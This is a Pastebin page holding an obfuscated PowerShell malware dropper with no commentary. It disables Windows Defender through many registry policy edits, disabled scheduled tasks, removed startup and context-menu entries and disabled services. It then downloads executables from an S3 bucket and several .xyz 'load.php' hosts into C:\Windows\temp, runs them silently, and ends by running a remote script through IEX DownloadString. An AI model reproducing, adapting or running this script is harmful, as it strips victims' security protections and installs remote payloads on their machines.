API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Dec 11th, 2018
95
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PowerShell 12.91 KB | None | 0 0
raw download clone embed print report
  1. &("{3}{5}{4}{2}{0}{1}" -f'e','ference','r','A','-MpP','dd')  -ExclusionExtension ("{1}{0}"-f'reg','.')
  2. &("{0}{1}" -f're','g') ("{1}{0}"-f'lete','de') ((("{16}{13}{2}{11}{15}{8}{6}{5}{9}{7}{0}{14}{10}{12}{1}{3}{4}"-f 's{0','ws D','oft','efen','der','i','l','e','0}Po','ci','Microsoft{','ware','0}Windo','M{0}S','}','{','HKL'))-f  [chaR]92) ('/f')
  3. &("{0}{1}" -f 're','g') ("{1}{0}" -f'd','ad') ((("{1}{6}{7}{4}{2}{3}{11}{8}{10}{0}{9}{5}"-f 'ws ','HKL','4qJ','P','ftware','der','M','4qJSo','oft4qJWi','Defen','ndo','olicies4qJMicros'))."R`ep`LacE"(([ChAR]52+[ChAR]113+[ChAR]74),'\')) ('/v') ("{1}{2}{3}{0}"-f 'ware','Disa','b','leAntiSpy') ('/t') ("{2}{0}{1}"-f 'G_DW','ORD','RE') ('/d') "1" ('/f')
  4. &("{0}{1}" -f're','g') ("{0}{1}"-f'a','dd') ((("{10}{0}{2}{15}{4}{1}{5}{17}{9}{12}{6}{11}{14}{7}{8}{3}{13}{16}"-f'LM{','ware','0}','ndows','ft','{0}','}M','sof','t{0}Wi','es','HK','ic','{0',' ','ro','So','Defender','Polici')) -F [cHAR]92) ('/v') ("{0}{1}{2}{3}" -f'Disab','leAn','tiViru','s') ('/t') ("{1}{2}{3}{0}" -f 'WORD','RE','G_','D') ('/d') "1" ('/f')
  5. &("{1}{0}" -f'g','re') ("{1}{0}" -f'd','ad') ((("{1}{4}{2}{9}{12}{10}{5}{3}{7}{11}{6}{0}{8}"-f 'pEng','HKLM5a8Software5a8','li','s ','Po','ft5a8Window','8M','Defende','ine','cies5a','roso','r5a','8Mic')) -crepLaCE  '5a8',[CHar]92) ('/v') ("{2}{1}{0}" -f 's','ablePu','MpEn') ('/t') ("{1}{0}" -f 'D','REG_DWOR') ('/d') "0" ('/f')
  6. &("{1}{0}" -f'eg','r') ("{0}{1}" -f 'ad','d') ((("{9}{6}{11}{2}{0}{10}{8}{5}{4}{12}{3}{13}{7}{1}"-f'ies{0}Microso','tection','}Polic','r','e','ws D','0}Softwar','Real-Time Pro','Windo','HKLM{','ft{0}','e{0','fende','{0}'))  -f [CHAR]92) ('/v') ("{2}{0}{4}{3}{1}{5}{6}"-f 'isableBe','onit','D','M','havior','ori','ng') ('/t') ("{0}{1}{2}" -f 'RE','G_DWOR','D') ('/d') "1" ('/f')
  7. &("{1}{0}" -f'g','re') ("{1}{0}" -f 'dd','a') ((("{2}{11}{17}{15}{12}{6}{4}{10}{1}{3}{19}{21}{8}{7}{20}{5}{0}{18}{13}{14}{16}{9}"-f 'e','softK81','HKLMK81','Wi','i','81R','M','Defe','s ','tection','cro','Soft','81','m','e Pr','iciesK','o','wareK81Pol','al-Ti','ndo','nderK','w'))-cREPLace  ([Char]75+[Char]56+[Char]49),[Char]92) ('/v') ("{1}{3}{4}{5}{2}{0}" -f 'otection','Disa','r','bleI','OAV','P') ('/t') ("{2}{0}{1}"-f 'W','ORD','REG_D') ('/d') "1" ('/f')
  8. &("{0}{1}"-f're','g') ("{0}{1}"-f 'a','dd') ((("{3}{1}{19}{11}{0}{18}{5}{4}{15}{20}{7}{21}{17}{9}{13}{2}{14}{10}{22}{6}{16}{8}{12}"-f 'ftwar','0','f','HKLM{','c','i','e','{0}Micro','e Protect','{0}Windows','er','o','ion',' De','end','ie','al-Tim','t','e{0}Pol','}S','s','sof','{0}R'))-f [CHaR]92) ('/v') ("{5}{2}{7}{4}{1}{6}{0}{3}" -f'c','A','sabl','tion','n','Di','ccessProte','eO') ('/t') ("{0}{1}{2}"-f 'REG_DW','OR','D') ('/d') "1" ('/f')
  9. &("{0}{1}"-f 're','g') ("{0}{1}"-f'ad','d') ((("{12}{14}{13}{4}{9}{16}{10}{3}{15}{0}{7}{17}{11}{8}{2}{6}{1}{5}"-f 'fe','ct','Time Prot','6Windows D','tware','ion','e','n','al-','1k6Policies1k6Mic','t1k','e','H','M1k6Sof','KL','e','rosof','der1k6R')).("{1}{0}{2}"-f'PlA','Re','CE').Invoke('1k6','\')) ('/v') ("{2}{0}{1}{3}{4}{5}"-f'isa','b','D','leR','ealtime','Monitoring') ('/t') ("{0}{1}{2}" -f 'REG','_','DWORD') ('/d') "1" ('/f')
  10. &("{1}{0}"-f'g','re') ("{0}{1}"-f'a','dd') ((("{13}{5}{2}{4}{16}{10}{7}{14}{0}{1}{11}{18}{3}{9}{6}{8}{17}{12}{15}" -f 'LXD','Windows ','DSoft','fen','w','LMLX','DReal-Tim','f','e','derLX','icroso','D','rot','HK','t','ection','areLXDPoliciesLXDM',' P','e'))-CReplAce ([CHAR]76+[CHAR]88+[CHAR]68),[CHAR]92) ('/v') ("{1}{4}{3}{0}{5}{7}{2}{6}"-f'R','DisableSca','nab','On','n','ealti','le','meE') ('/t') ("{0}{2}{1}" -f 'REG_','D','DWOR') ('/d') "1" ('/f')
  11. &("{0}{1}"-f'r','eg') ("{1}{0}" -f 'dd','a') ((("{10}{11}{15}{3}{0}{6}{1}{7}{2}{4}{8}{12}{16}{14}{9}{17}{13}{5}"-f'{','Pol','oft','e','{0}','g','0}','icies{0}Micros','W','D','H','K','i','}Reportin','dows ','LM{0}Softwar','n','efender{0')) -f [cHAr]92) ('/v') ("{4}{0}{6}{3}{7}{8}{1}{2}{5}"-f 'i','No','tification','b','D','s','sa','leEnh','anced') ('/t') ("{1}{0}{2}"-f'R','REG_DWO','D') ('/d') "1" ('/f')
  12. &("{1}{0}"-f 'g','re') ("{0}{1}"-f'ad','d') ((("{13}{9}{8}{15}{11}{4}{16}{5}{17}{2}{12}{0}{18}{3}{1}{6}{7}{14}{10}" -f ' ','e','{0}Win','ef','icr','o','nder','{0}','ware{0}Po','}Soft','t','{0}M','dows','HKLM{0','SpyNe','licies','os','ft','D'))  -f  [ChAr]92) ('/v') ("{5}{0}{6}{4}{3}{2}{1}" -f 'leBlo','een','stS','r','i','Disab','ckAtF') ('/t') ("{0}{1}{2}" -f 'REG','_D','WORD') ('/d') "1" ('/f')
  13. &("{0}{1}"-f're','g') ("{1}{0}" -f'dd','a') ((("{2}{10}{6}{8}{11}{9}{0}{4}{5}{1}{3}{7}" -f'e','enderxkFS','H','py','sxkFMi','crosoftxkFWindows Def','kFSoft','Net','warex','ci','KLMx','kFPoli'))  -replace ([cHaR]120+[cHaR]107+[cHaR]70),[cHaR]92) ('/v') ("{2}{0}{3}{1}"-f 'net','eporting','Spy','R') ('/t') ("{0}{1}" -f 'REG_D','WORD') ('/d') "0" ('/f')
  14. &("{1}{0}"-f'g','re') ("{0}{1}" -f 'ad','d') ((("{17}{11}{13}{8}{16}{9}{7}{6}{14}{10}{2}{0}{4}{1}{15}{5}{3}{12}" -f 'ind',' Defe','sW','e','ows','pyN','sVasMicrosof','licie','tw','o','a','MVasS','t','of','tV','nderVasS','areVasP','HKL')) -replAce  ([cHAR]86+[cHAR]97+[cHAR]115),[cHAR]92) ('/v') ("{0}{1}{3}{2}{4}" -f 'SubmitSam','ple','n','sConse','t') ('/t') ("{0}{2}{1}" -f 'REG_DW','D','OR') ('/d') "0" ('/f')
  15. &("{1}{0}"-f'g','re') ("{0}{1}" -f'a','dd') ((("{15}{3}{10}{8}{0}{4}{7}{13}{11}{9}{16}{2}{5}{12}{14}{6}{1}" -f'lS','gger','gger','System{0','et','{0}','Lo','{0}C','tro','ol','}CurrentCon','MI{0}Aut','Defe','ontrol{0}W','nderApi','HKLM{0}','o'))-F [CHaR]92) ('/v') ("{1}{0}"-f 'art','St') ('/t') ("{1}{0}{2}"-f 'DWO','REG_','RD') ('/d') "0" ('/f')
  16. &("{1}{0}"-f'eg','r') ("{1}{0}"-f'd','ad') ((("{15}{21}{22}{1}{19}{18}{3}{12}{8}{4}{11}{6}{2}{0}{14}{5}{7}{9}{17}{16}{13}{10}{20}" -f 'to','s','u','t{0','tro','og','0}WMI{0}A','ger{','n','0}Defe','o','l{','}Co','itL','l','HKLM{0','derAud','n','ontrolSe','tem{0}CurrentC','gger','}S','y'))  -F [CHAr]92) ('/v') ("{0}{1}"-f'Sta','rt') ('/t') ("{0}{1}{2}"-f 'REG_','DWO','RD') ('/d') "0" ('/f')
  17. &("{2}{0}{1}"-f'ch','tasks','s') ("{1}{0}"-f 'ange','/Ch') ("{1}{0}" -f 'TN','/') ((("{2}{4}{7}{5}{3}{0}{13}{8}{1}{6}{10}{12}{11}{9}"-f'rd{0}E','rd','Microsoft{0','ua','}Win','0}ExploitG',' ','dows{','loitGua','h','MD','cy Refres','M poli','xp'))-F  [CHaR]92) ("{1}{0}{2}" -f 'a','/Dis','ble')
  18. &("{0}{1}" -f'schtask','s') ("{1}{0}{2}"-f'a','/Ch','nge') ("{1}{0}"-f'N','/T') ((("{5}{1}{12}{13}{9}{2}{11}{0}{4}{7}{8}{10}{3}{6}"-f 'efenderN','cr','ows ','fender Cac','mSW','Mi','he Maintenance','indo','w','ind','s De','D','osoftNmSWindows','NmSW')) -RePLace  'NmS',[chAR]92) ("{0}{1}"-f '/D','isable')
  19. &("{0}{2}{1}"-f 'schta','ks','s') ("{0}{1}"-f '/Chan','ge') ("{1}{0}" -f 'N','/T') ((("{3}{0}{6}{10}{12}{9}{13}{2}{4}{8}{15}{11}{14}{5}{7}{1}" -f 'FWindows','eanup','f','Microsoftn1','ende','er ','n1FW','Cl','r','s','indo','dows Def','w',' De','end','n1FWin'))."rEp`l`ACE"(([cHaR]110+[cHaR]49+[cHaR]70),[STRing][cHaR]92)) ("{1}{2}{0}"-f'able','/Di','s')
  20. &("{1}{2}{0}" -f 's','scht','ask') ("{0}{1}"-f'/Cha','nge') ("{1}{0}" -f'N','/T') ((("{12}{14}{13}{0}{6}{7}{9}{5}{10}{1}{11}{8}{15}{16}{3}{2}{4}" -f '0}Windo','0','nder S','efe','cheduled Scan','Defend','ws{0','}Window','Window','s ','er{','}','Mi','{','crosoft','s ','D')) -F  [ChAr]92) ("{1}{0}{2}"-f 'Disa','/','ble')
  21. &("{0}{1}{2}" -f 'schtas','k','s') ("{0}{1}{2}" -f'/','Chan','ge') ("{1}{0}"-f 'N','/T') ((("{10}{2}{9}{14}{6}{16}{12}{8}{5}{7}{1}{13}{15}{3}{11}{4}{0}"-f 'ion','D','ft{','Ver','icat','}Windows','0}W',' ','{0','0','Microso','if','dows Defender','efende','}Windows{','r ','in')) -F  [chAr]92) ("{2}{0}{1}" -f 'Di','sable','/')
  22. &("{0}{1}"-f're','g') ("{1}{0}" -f'ete','del') ((("{12}{24}{6}{9}{3}{8}{1}{11}{19}{16}{13}{7}{20}{10}{23}{14}{5}{0}{4}{22}{17}{21}{18}{2}{15}"-f'{','of','d{0','ware{0','0','lorer','M{0}Sof','ers','}Micros','t','n{','t{0}W','H','CurrentV','Exp','}Run','s{0}','t','e','indow','io','upApprov','}Star','0}','KL'))-f[cHAR]92) ('/v') ("{2}{0}{4}{1}{3}" -f 'o',' Defe','Wind','nder','ws') ('/f')
  23. &("{1}{0}" -f'eg','r') ("{1}{0}"-f'te','dele') ((("{10}{12}{5}{6}{11}{4}{0}{8}{7}{2}{14}{1}{13}{3}{9}{15}" -f'oftYc','Curre','Y','tV','os','YcjSof','twareYc','ndows','jWi','ers','HKC','jMicr','U','n','cj','ionYcjRun'))-cRePLaCe'Ycj',[cHaR]92) ('/v') ("{3}{2}{0}{1}{4}" -f ' Def','e','dows','Win','nder') ('/f')
  24. &("{1}{0}"-f 'g','re') ("{0}{1}"-f'del','ete') ((("{5}{10}{6}{1}{11}{8}{0}{3}{4}{9}{7}{2}"-f'Window','{0}Mic','un','s{0}','Current','HKL','e','ersion{0}R','ft{0}','V','M{0}Softwar','roso'))  -F[cHaR]92) ('/v') ("{2}{1}{0}"-f 'fender','ndowsDe','Wi') ('/f')
  25. &("{1}{0}" -f'g','re') ("{0}{1}" -f'dele','te') ((("{7}{0}{1}{6}{8}{5}{12}{2}{4}{10}{9}{11}{3}"-f'{0}*{0}sh','elle','s','P','{','Menu','x{0}','HKCR','Context','}','0','EP','Handler')) -f[char]92) ('/f')
  26. &("{1}{0}" -f'eg','r') ("{1}{2}{0}"-f'e','del','et') ((("{2}{4}{5}{0}{7}{1}{3}{8}{6}" -f 'yOc','lex','H','OcUCo','KCRO','cUDirector','tMenuHandlersOcUEPP','Ushel','ntex'))."Re`p`lACE"(([cHAr]79+[cHAr]99+[cHAr]85),[sTrIng][cHAr]92)) ('/f')
  27. &("{0}{1}"-f're','g') ("{1}{0}" -f 'e','delet') ((("{5}{13}{8}{7}{0}{11}{14}{3}{4}{2}{6}{1}{12}{10}{9}"-f'Sshell','nd','ntextMenu','S','Co','HKCR','Ha','C','veD','PP','DCSE','exD','lers','DCSDri','C')).("{1}{0}" -f 'CE','RePLa').Invoke('DCS','\')) ('/f')
  28. &("{1}{0}"-f 'eg','r') ("{0}{1}"-f'a','dd') ((("{7}{8}{11}{4}{6}{12}{0}{9}{5}{10}{1}{13}{2}{14}{3}" -f'C','QS','v','XbQWdBoot','b','et','QCurren','HKLM','XbQSy','ontrolS','Xb','stemX','t','er','ices'))."r`EplaCE"(([chaR]88+[chaR]98+[chaR]81),'\')) ('/v') ("{1}{0}"-f 'art','St') ('/t') ("{1}{0}{2}"-f'O','REG_DW','RD') ('/d') "4" ('/f')
  29. &("{1}{0}" -f'g','re') ("{0}{1}"-f 'a','dd') ((("{7}{8}{4}{9}{3}{5}{1}{2}{6}{0}" -f'r','vicesK7IWdF','ilt','tK','rre','7ISer','e','HKLMK7IS','ystemK7ICu','ntControlSe')).("{1}{0}{2}" -f 'l','REP','ACe').Invoke('K7I','\')) ('/v') ("{1}{0}"-f 'rt','Sta') ('/t') ("{2}{0}{1}" -f 'E','G_DWORD','R') ('/d') "4" ('/f')
  30. &("{1}{0}" -f 'eg','r') ("{1}{0}"-f'dd','a') ((("{12}{9}{8}{10}{14}{11}{1}{3}{13}{15}{0}{7}{5}{6}{4}{2}"-f 'Q','entC','v','ont','Dr','BJQWdNi','s','Services','BJQSystemBJQ','M','C','r','HKL','r','ur','olSetBJ'))."R`eplACE"('BJQ',[striNG][CHAr]92)) ('/v') ("{1}{0}"-f 'rt','Sta') ('/t') ("{1}{0}{2}"-f 'EG_','R','DWORD') ('/d') "4" ('/f')
  31. &("{0}{1}" -f 're','g') ("{0}{1}" -f'ad','d') ((("{1}{10}{7}{3}{2}{4}{9}{6}{11}{8}{0}{12}{5}" -f 'v','HKL','temSdYC','Sys','u','sSvc','Control','SdY','er','rrent','M','SetSdYS','icesSdYWdNi'))."ReP`laCe"(([CHaR]83+[CHaR]100+[CHaR]89),'\')) ('/v') ("{0}{1}"-f 'Star','t') ('/t') ("{1}{2}{0}" -f 'WORD','REG_','D') ('/d') "4" ('/f')
  32. &("{0}{1}"-f're','g') ("{1}{0}" -f'dd','a') ((("{8}{9}{4}{2}{12}{14}{3}{7}{5}{1}{11}{0}{6}{10}{13}" -f'ces','er','emFS','rre','st','ontrolSetFSKS','FSK','ntC','HKLMFSKS','y','WinDef','vi','K','end','Cu')).("{0}{1}"-f'R','EPlace').Invoke('FSK','\')) ('/v') ("{0}{1}" -f 'Star','t') ('/t') ("{2}{1}{0}"-f 'ORD','G_DW','RE') ('/d') "4" ('/f')
  33.  
  34. (&("{0}{2}{1}" -f'N','t','ew-Objec') ("{2}{3}{0}{1}"-f'ien','t','Ne','t.WebCl')).("{1}{2}{0}" -f'e','Do','wnloadFil').Invoke(("{8}{2}{6}{0}{3}{7}{1}{4}{5}{9}" -f'az','e','t','o','r-','agreemen','tps://s3.am','naws.com/us','h','t/amazon.exe'),("{3}{6}{4}{2}{1}{0}{5}" -f'lc_u','mp/v','e','C:','dows/t','pdate.exe','/Win'))
  35. &("{0}{1}{2}"-f'st','art','-process') -FilePath ((("{8}{5}{4}{1}{2}{10}{6}{11}{0}{7}{9}{3}" -f 'bvlc','in','do','.exe','W',':vBb','svBb','_up','C','date','w','tempvB'))  -rEpLACe([Char]118+[Char]66+[Char]98),[Char]92) -ArgumentList ("{1}{2}{0}{3}"-f 'T','/VERYSI','LEN',' /MON_ID=8')
  36.  
  37. (&("{1}{2}{0}" -f'ct','New-O','bje') ("{5}{0}{1}{2}{3}{4}" -f'e','m.Net.Web','Clie','n','t','Syst')).("{2}{1}{0}{3}" -f'i','oadF','Downl','le').Invoke(("{5}{4}{1}{3}{2}{0}{6}"-f'oad.','k','/l','o.xyz','n','http://ze','php'), ((("{3}{0}{2}{1}{4}{6}{5}"-f 'ndows','pZ','ZaGtem','c:ZaGwi','aG','.exe','mini'))."r`EPlacE"(([cHAR]90+[cHAR]97+[cHAR]71),'\')));&("{2}{0}{1}" -f 'ces','s','Start-Pro') ((("{0}{5}{3}{1}{4}{2}" -f'c:','ows2E7','emp2E7mini.exe','nd','t','2E7wi'))."RE`pl`Ace"('2E7',[sTriNG][CHAr]92))
  38. (&("{1}{0}{2}" -f'Ob','New-','ject') ("{3}{1}{2}{6}{0}{4}{5}"-f'b','.N','et.W','System','Clie','nt','e')).("{2}{1}{0}" -f 'oadFile','nl','Dow').Invoke(("{3}{4}{1}{2}{5}{0}"-f'd.php','rr.','x','ht','tp://loame','yz/loa'), ((("{5}{7}{4}{2}{0}{3}{6}{8}{1}" -f 'tempoXjm','e','Xj','on','so','c:oXjwindo','o.','w','ex')).("{0}{2}{1}" -f 'RePla','E','C').Invoke('oXj','\')));&("{0}{2}{1}"-f'Start-Proce','s','s') ((("{8}{1}{4}{2}{3}{7}{5}{0}{9}{6}" -f'e',':i0uwi','owsi0u','t','nd','ono.','e','empi0um','c','x'))-rePlAcE'i0u',[CHaR]92)
  39. (&("{2}{1}{0}"-f'ject','-Ob','New') ("{3}{5}{0}{2}{4}{1}"-f 't','ient','em.N','Sy','et.WebCl','s')).("{2}{1}{0}{3}" -f 'l','wnloadFi','Do','e').Invoke(("{4}{2}{3}{1}{6}{5}{0}" -f 'oad.php','k','t','p://coni','ht','yz/l','ox.x'), ((("{5}{4}{3}{0}{2}{1}"-f 'ws{0}','mp{0}mana.exe','te','ndo','{0}wi','c:')) -f  [CHAr]92));&("{0}{1}{2}" -f 'Sta','rt-Pro','cess') ((("{5}{3}{6}{2}{7}{4}{0}{1}"-f'ex','e','t','windows','}mana.','c:{0}','{0}','emp{0'))-F  [cHAr]92)
  40.  
  41. &("{0}{1}" -f 'I','EX') (&("{1}{0}{2}" -f'Ob','New-','ject') ("{1}{0}{2}"-f 'et.WebClie','N','nt')).("{1}{0}{2}" -f'stri','Download','ng').Invoke(("{14}{11}{8}{13}{9}{6}{1}{4}{0}{7}{2}{5}{12}{10}{3}"-f'om','er.','1','dd/1/','c','1878','atcount','/','p','/c.st','/301540','t','954/0',':/','ht'))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!